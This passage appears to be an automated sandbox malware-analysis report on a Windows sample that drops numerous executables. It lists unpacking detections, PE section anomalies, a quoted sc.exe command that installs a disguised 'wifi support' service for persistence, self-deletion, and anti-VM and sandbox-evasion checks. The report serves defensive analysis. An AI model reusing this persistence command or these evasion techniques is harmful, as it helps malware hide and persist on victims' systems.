                      Source: Binary string: ZC:\gilos\ye.pdbhQD source: 18D.exe, 00000012.00000002.391234957.0000000000782000.00000004.00000001.sdmp, 18D.exe, 00000012.00000000.365358490.0000000000401000.00000020.00020000.sdmp, sdiimdop.exe, 0000001F.00000000.391356677.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.465105222.0000000003258000.00000004.00000001.sdmp
                      Source: Binary string: VC:\hatisicovapehe\p.pdb source: 2997.exe, 00000011.00000002.369808653.0000000000409000.00000020.00020000.sdmp, 2997.exe, 00000011.00000000.353771272.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\tozeroc-watege99_zaga\vifalaro.pdb source: 4187.exe, 0000002A.00000003.446573203.0000000000CB0000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Unpacked PE file: 18.2.18D.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Unpacked PE file: 31.2.sdiimdop.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\4187.exe | Unpacked PE file: 42.2.4187.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\4187.exe | Unpacked PE file: 42.2.4187.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Unpacked PE file: 17.2.2997.exe.400000.0.unpack .text:ER;.data:W;.pamicak:W;.dos:W;.modav:W;.nugirof:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Unpacked PE file: 18.2.18D.exe.400000.0.unpack .text:ER;.data:W;.lave:W;.fidoce:W;.pihudu:W;.lafog:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Unpacked PE file: 31.2.sdiimdop.exe.400000.0.unpack .text:ER;.data:W;.lave:W;.fidoce:W;.pihudu:W;.lafog:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\scifbcd | Unpacked PE file: 38.2.scifbcd.400000.0.unpack .text:ER;.data:W;.pamicak:W;.dos:W;.modav:W;.nugirof:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\4187.exe | Unpacked PE file: 42.2.4187.exe.400000.0.unpack .text:ER;.data:W;.johac:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
.NET source code contains method to dynamically call methods (often used by packers)
Source: CBA.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 19.0.CBA.exe.cb0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 19.0.CBA.exe.cb0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 19.0.CBA.exe.cb0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 19.2.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 33.0.CBA.exe.f90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 33.0.CBA.exe.f90000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 0_2_00422188 push eax; ret
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 0_2_00543634 push es; iretd
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_2_00401880 push esi; iretd
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_2_00402E94 push es; iretd
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_1_00402E94 push es; iretd
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 13_2_00473634 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\115B.exe | Code function: 14_2_00473634 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\115B.exe | Code function: 14_2_006C97F2 push esi; ret
Source: C:\Users\user\AppData\Local\Temp\115B.exe | Code function: 14_2_006C978D push esi; ret
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_2_00401880 push esi; iretd
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_2_00402E94 push es; iretd
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_1_00402E94 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\115B.exe | Code function: 16_2_00402E94 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\115B.exe | Code function: 16_1_00402E94 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_00422368 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_00788964 push edi; iretd
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_007889A6 push edi; iretd
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_0078CAF0 pushfd ; retf
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_0078EA86 push esp; iretd
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_0041A041 push ds; iretd
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_00417819 push cs; ret
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_00415896 push es; retf
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_004179DB push eax; iretd
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_00416264 pushfd ; iretd
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_004186F0 pushad ; retf
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_00419EA2 push esi; retf
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_00419F4E push 71586EF6h; iretd
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_00421F58 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_00774772 push ds; ret
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_00776F68 push 0000002Bh; iretd
Source: C:\Users\user\AppData\Local\Temp\CBA.exe | Code function: 19_2_00CB765B push ebp; ret
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 0_2_004309A0 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
Source: CBA.exe.3.dr | Static PE information: 0x8A3B5B05 [Sun Jun 28 23:08:53 2043 UTC]
Source: nkINykHreE.exe | Static PE information: section name: .bekuvox
Source: nkINykHreE.exe | Static PE information: section name: .jutu
Source: nkINykHreE.exe | Static PE information: section name: .vezev
Source: nkINykHreE.exe | Static PE information: section name: .mubone
Source: 115B.exe.3.dr | Static PE information: section name: .bekuvox
Source: 115B.exe.3.dr | Static PE information: section name: .jutu
Source: 115B.exe.3.dr | Static PE information: section name: .vezev
Source: 115B.exe.3.dr | Static PE information: section name: .mubone
Source: 2997.exe.3.dr | Static PE information: section name: .pamicak
Source: 2997.exe.3.dr | Static PE information: section name: .dos
Source: 2997.exe.3.dr | Static PE information: section name: .modav
Source: 2997.exe.3.dr | Static PE information: section name: .nugirof
Source: 4187.exe.3.dr | Static PE information: section name: .johac
Source: 1B15.exe.3.dr | Static PE information: section name: .nulec
Source: 1B15.exe.3.dr | Static PE information: section name: .pexano
Source: 1B15.exe.3.dr | Static PE information: section name: .tufeh
Source: 1B15.exe.3.dr | Static PE information: section name: .rijeyo
Source: 28C2.exe.3.dr | Static PE information: section name: .wibobah
Source: 315E.exe.3.dr | Static PE information: section name:
Source: 315E.exe.3.dr | Static PE information: section name:
Source: 315E.exe.3.dr | Static PE information: section name:
Source: 315E.exe.3.dr | Static PE information: section name:
Source: 315E.exe.3.dr | Static PE information: section name:
Source: 315E.exe.3.dr | Static PE information: section name:
Source: 315E.exe.3.dr | Static PE information: section name:
Source: 315E.exe.3.dr | Static PE information: section name: .7w0DPA1
Source: 315E.exe.3.dr | Static PE information: section name: .adata
Source: 4583.exe.3.dr | Static PE information: section name: .himav
Source: 4BED.exe.3.dr | Static PE information: section name:
Source: 4BED.exe.3.dr | Static PE information: section name:
Source: 4BED.exe.3.dr | Static PE information: section name:
Source: 18D.exe.3.dr | Static PE information: section name: .lave
Source: 18D.exe.3.dr | Static PE information: section name: .fidoce
Source: 18D.exe.3.dr | Static PE information: section name: .pihudu
Source: 18D.exe.3.dr | Static PE information: section name: .lafog
Source: haifbcd.3.dr | Static PE information: section name: .bekuvox
Source: haifbcd.3.dr | Static PE information: section name: .jutu
Source: haifbcd.3.dr | Static PE information: section name: .vezev
Source: haifbcd.3.dr | Static PE information: section name: .mubone
Source: scifbcd.3.dr | Static PE information: section name: .pamicak
Source: scifbcd.3.dr | Static PE information: section name: .dos
Source: scifbcd.3.dr | Static PE information: section name: .modav
Source: scifbcd.3.dr | Static PE information: section name: .nugirof
Source: sdiimdop.exe.18.dr | Static PE information: section name: .lave
Source: sdiimdop.exe.18.dr | Static PE information: section name: .fidoce
Source: sdiimdop.exe.18.dr | Static PE information: section name: .pihudu
Source: sdiimdop.exe.18.dr | Static PE information: section name: .lafog
Source: initial sample | Static PE information: section where entry point is pointing to: .rdata
Source: 315E.exe.3.dr | Static PE information: real checksum: 0x2be809 should be: 0x18483a
Source: 13E0.exe.3.dr | Static PE information: real checksum: 0x0 should be: 0x1fc0c4
Source: CBA.exe.3.dr | Static PE information: real checksum: 0x0 should be: 0x881f2
Source: initial sample | Static PE information: section name: .text entropy: 6.85301887621
Source: initial sample | Static PE information: section name: .text entropy: 6.85301887621
Source: initial sample | Static PE information: section name: .text entropy: 6.86420375863
Source: initial sample | Static PE information: section name: .rdata entropy: 7.99705651429
Source: initial sample | Static PE information: section name: .text entropy: 7.73188934702
Source: initial sample | Static PE information: section name: .text entropy: 7.74923662565
Source: initial sample | Static PE information: section name: entropy: 7.99764058394
Source: initial sample | Static PE information: section name: entropy: 7.89880329126
Source: initial sample | Static PE information: section name: entropy: 7.99168901934
Source: initial sample | Static PE information: section name: entropy: 7.83347227701
Source: initial sample | Static PE information: section name: .rsrc entropy: 7.22930647149
Source: initial sample | Static PE information: section name: entropy: 7.9648385851
Source: initial sample | Static PE information: section name: entropy: 7.57856847804
Source: initial sample | Static PE information: section name: .7w0DPA1 entropy: 7.91708548884
Source: initial sample | Static PE information: section name: entropy: 7.99965749705
Source: initial sample | Static PE information: section name: .text entropy: 6.84705231543
Source: initial sample | Static PE information: section name: .text entropy: 6.85301887621
Source: initial sample | Static PE information: section name: .text entropy: 6.86420375863
Source: initial sample | Static PE information: section name: .text entropy: 6.84705231543
Source: CBA.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: CBA.exe.3.dr, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs | High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
Source: CBA.exe.3.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
Source: 19.0.CBA.exe.cb0000.1.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs | High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
Source: 19.0.CBA.exe.cb0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
Source: 19.0.CBA.exe.cb0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 19.0.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 19.0.CBA.exe.cb0000.0.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs | High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
Source: 19.0.CBA.exe.cb0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
Source: 19.0.CBA.exe.cb0000.3.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs | High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
Source: 19.0.CBA.exe.cb0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
Source: 19.0.CBA.exe.cb0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 19.0.CBA.exe.cb0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 19.0.CBA.exe.cb0000.2.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs | High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
Source: 19.0.CBA.exe.cb0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
Source: 19.2.CBA.exe.cb0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
Source: 19.2.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 33.0.CBA.exe.f90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 33.0.CBA.exe.f90000.2.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs | High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
Source: 33.0.CBA.exe.f90000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
Source: 33.0.CBA.exe.f90000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 33.0.CBA.exe.f90000.7.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs | High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
Source: 33.0.CBA.exe.f90000.7.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: unknown | Executable created and started: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe
Source: C:\Users\user\AppData\Local\Temp\2757.exe | File created: C:\ProgramData\sqlite3.dll
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\haifbcd
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\scifbcd
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\13E0.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\haifbcd
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\scifbcd
Source: C:\Users\user\AppData\Local\Temp\2757.exe | File created: C:\ProgramData\sqlite3.dll
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\28C2.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\4BED.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\4187.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\4583.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\CBA.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\18D.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\315E.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\18D.exe | File created: C:\Users\user\AppData\Local\Temp\sdiimdop.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\1B15.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\2757.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\115B.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\2997.exe
Source: C:\Users\user\AppData\Local\Temp\2757.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\sqlite3[1].dll
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe (copy)
Source: C:\Windows\SysWOW64\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dbgxuqbr
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      Deletes itself after installation
                      Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\nkinykhree.exe
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\haifbcd:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: 18_2_00401000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe Process information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Tries to evade analysis by executing a special instruction which causes a usermode exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Special instruction interceptor: First address: 0000000001002ADA instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Special instruction interceptor: First address: 0000000001007252 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Special instruction interceptor: First address: 000000000100C8EB instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Special instruction interceptor: First address: 0000000001013E54 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Special instruction interceptor: First address: 0000000001015916 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Special instruction interceptor: First address: 0000000001015A9A instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Special instruction interceptor: First address: 0000000001015A90 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Special instruction interceptor: First address: 00000000013FC12F instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Special instruction interceptor: First address: 000000000100BC35 instructions 0F0B caused by: Known instruction #UD exception
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe System information queried: FirmwareTableInformation
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 2997.exe, 00000011.00000002.370102602.0000000000794000.00000004.00000001.sdmp Binary or memory string: ASWHOOK
                      Checks if the current machine is a virtual machine (disk enumeration)
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\haifbcd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\2997.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\scifbcd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Windows\explorer.exe TID: 6672 Thread sleep count: 581 > 30
                      Source: C:\Windows\explorer.exe TID: 6680 Thread sleep count: 211 > 30
                      Source: C:\Windows\explorer.exe TID: 6676 Thread sleep count: 279 > 30
                      Source: C:\Windows\explorer.exe TID: 7028 Thread sleep count: 385 > 30
                      Source: C:\Windows\explorer.exe TID: 4080 Thread sleep count: 143 > 30
                      Source: C:\Windows\explorer.exe TID: 7072 Thread sleep count: 157 > 30
                      Source: C:\Windows\explorer.exe TID: 5684 Thread sleep count: 373 > 30
                      Source: C:\Windows\explorer.exe TID: 5772 Thread sleep count: 185 > 30
                      Source: C:\Windows\explorer.exe TID: 5688 Thread sleep count: 142 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6492 Thread sleep time: -30000s >= -30000s
